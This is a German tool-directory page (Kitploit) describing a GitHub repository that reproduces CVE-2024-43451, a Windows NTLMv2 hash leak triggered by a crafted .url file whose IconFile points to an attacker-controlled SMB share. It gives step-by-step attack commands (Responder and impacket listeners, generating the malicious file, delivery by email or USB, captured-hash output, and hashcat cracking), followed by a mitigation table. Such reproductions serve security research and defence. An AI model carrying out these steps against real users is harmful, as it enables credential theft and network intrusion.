Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-43451-ntlm_hash_disclosure_reproduction — CVE-Reproduktion: cve-2024-43451-ntlm_hash_disclosure_reproduction | Kitploit
Tools/GitHubGitHub/razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction
Passwort-CrackingPhishing-ToolsAufklärungSchwachstellenanalyseExploitationInformationsbeschaffungLernen & BildungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction

cve-2024-43451-ntlm_hash_disclosure_reproduction

CVE-Reproduktion: cve-2024-43451-ntlm_hash_disclosure_reproduction

Repository anzeigen
vor 29 TagenNoch nicht geprüft

CVE-2024-43451 — Spoofing-Schwachstelle zur Offenlegung von NTLM-Hashes in Windows

Überblick

CVE-2024-43451 ist eine Schwachstelle in Windows, die durch Spoofing die Offenlegung von NTLMv2-Hashes ermöglicht. Sie erlaubt einem nicht authentifizierten entfernten Angreifer, den NTLM-Hash eines Opfers abzugreifen, indem das Opfer dazu gebracht wird, mit einer bösartigen .url-Verknüpfungsdatei zu interagieren. Die Schwachstelle wird mit minimaler Benutzerinteraktion ausgelöst – bereits ein Rechtsklick, Löschen oder Verschieben der Datei genügt, um den Hash preiszugeben. Sie hat einen CVSS-Score von 6.5 (Mittel) und wurde aktiv in freier Wildbahn ausgenutzt. CISA hat sie in den Katalog bekannter ausgenutzter Schwachstellen (KEV) aufgenommen.

Technische Details

NTLM-Authentifizierung

NTLM (NT LAN Manager) ist ein Challenge-Response-Authentifizierungsprotokoll, das von Windows verwendet wird. Wenn ein Client versucht, über SMB auf eine Ressource zuzugreifen, führen Client und Server einen Handshake durch:

  1. Der Client sendet eine NEGOTIATE_MESSAGE mit den unterstützten Fähigkeiten.
  2. Der Server antwortet mit einer CHALLENGE_MESSAGE, die eine 8-Byte-Nonce (Server-Challenge) enthält.
  3. Der Client antwortet mit einer AUTHENTICATE_MESSAGE, die den NTLMv2-Hash enthält – ein HMAC-MD5 der Challenge kombiniert mit dem Passwort-Hash des Benutzers, dem Benutzernamen und der Domäne.

Wenn ein Angreifer einen NTLM-Authentifizierungsversuch gegenüber einer von ihm kontrollierten Maschine beobachten oder auslösen kann, kann die erfasste AUTHENTICATE_MESSAGE offline geknackt werden, um das Klartext-Passwort wiederherzustellen.

.url-Dateiformat

Eine .url-Datei ist eine Verknüpfungsdatei, die von Internet Explorer und Windows Explorer zum Speichern von Links verwendet wird. Es handelt sich um eine INI-formatierte Datei mit einem Abschnitt [InternetShortcut]. Die für die Ausnutzung kritischen Felder sind:

  • URL= – die Ziel-URL, die Windows öffnen wird.
  • IconFile= – ein optionaler UNC-Pfad zu einer Symbolressource. Wenn Windows Explorer die Datei rendert, versucht es automatisch, das Symbol aus der entfernten Freigabe abzurufen, was einen NTLM-Authentifizierungsversuch gegenüber dem Server des Angreifers auslöst.

Angriffsvektor

Der Angreifer erstellt eine .url-Datei mit einem IconFile-Parameter, der auf \\angreifer-ip\freigabe\icon.ico zeigt. Wenn das Opfer:

  • Rechtsklick auf die Datei (Windows Explorer ruft das Symbol für das Kontextmenü ab),
  • Verschiebt oder kopiert die Datei (das Symbol wird erneut gelesen), oder
  • Löscht die Datei (das Symbol wird für den Papierkorb-Dialog abgerufen),

versucht Windows Explorer, das Symbol über den UNC-Pfad zu laden und sendet dabei den NTLMv2-Hash des Opfers an den SMB-Listener des Angreifers (z. B. Responder).

Betroffene Versionen

Alle unterstützten Windows-Versionen vor dem Patchday im November 2024:

  • Windows 10 (alle Versionen)
  • Windows 11
  • Windows Server 2016 / 2019 / 2022 / 2025
  • Windows Server 2008 / 2012 R2
  • Ältere, nicht mehr unterstützte Versionen sind wahrscheinlich ebenfalls anfällig, erhalten aber keine Patches.

Einrichtung der Ausnutzung

Voraussetzungen

  • Angreifer-Maschine: Linux oder Windows mit einem SMB-Capture-Tool (z. B. Responder, Impackets smbserver oder Inveigh).
  • Opfer-Maschine: Jedes nicht gepatchte Windows-System.
  • Netzwerkzugriff: Das Opfer muss die IP des Angreifers über Port 445 (SMB) erreichen können.

Tools

ToolBeschreibung
ResponderLLMNR/NBT-NS/mDNS-Poisoner mit integriertem SMB-Server zum Erfassen von Hashes

Reproduktionsschritte

1. SMB-Listener starten (Angreifer-Maschine)

Mit Responder:

root@kitploit:~
sudo responder -I eth0 -v

Oder mit Impacket:

root@kitploit:~
sudo impacket-smbserver share . -smb2support

2. Bösartige .url-Datei erzeugen

root@kitploit:~
python exploit.py --ip 192.168.1.100 --output malicious.url

3. Datei an das Opfer liefern

  • E-Mail-Anhang, USB-Stick, Dateifreigabe oder Web-Download.

4. Interaktion des Opfers

Jede der folgenden Aktionen löst den Hash-Leak aus:

  • Rechtsklick → das Symbol wird für das Kontextmenü abgerufen → NTLM-Handshake wird an den Angreifer gesendet
  • Löschen → das Symbol wird für den Bestätigungsdialog abgerufen
  • Verschieben/Kopieren → das Symbol wird erneut über den UNC-Pfad gelesen
  • Bereits das Anzeigen des Ordners in der Ansicht Details oder Symbole (Symbol laden)

5. Hash erfassen

Der SMB-Listener des Angreifers empfängt einen NTLMv2-Hash:

root@kitploit:~
[SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

6. Hash knacken (offline)

root@kitploit:~
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt

Proof of Concept

root@kitploit:~
# See exploit.py in this repository for a full PoC implementation.
# The script generates a .url file with IconFile set to:
#   \\192.168.1.100\share\icon.ico
# and optionally a custom display icon via IconIndex.

Gegenmaßnahmen

Referenzen

  • Microsoft Security Response Center — CVE-2024-43451
  • CISA-Katalog bekannter ausgenutzter Schwachstellen
  • NVD — CVE-2024-43451
  • Responder — GitHub
  • Impacket — GitHub
  • The Hacker News — Gezielte Angriffe auf die Ukraine
  • Analyse der Kampagne UAC-0194 / SparkRAT
Tool herunterladen
Impacket
Mit smbserver.py kann eine einfache SMB-Freigabe bereitgestellt werden
InveighPowerShell-basiertes NTLM-Capture-Tool für Windows
GegenmaßnahmeBeschreibung
Patch vom November 2024 einspielenMicrosoft-Sicherheitsupdate aus KB5044285 installieren
Ausgehendes SMB blockieren (Port 445)Verhindern, dass NTLM-Hashes die Netzwerkgrenze verlassen
NTLM wo möglich deaktivierenNur noch Kerberos-Authentifizierung verwenden
SMB-Signierung aktivierenVerhindert Relay-Angriffe, selbst wenn Hashes erfasst werden
Schulung der BenutzerBenutzer darin schulen, nicht mit unerwarteten .url-Dateien zu interagieren
Behandlung von .url-Dateien einschränkenÜber Gruppenrichtlinien die Ausführung oder Zustellung von .url-Dateien per E-Mail blockieren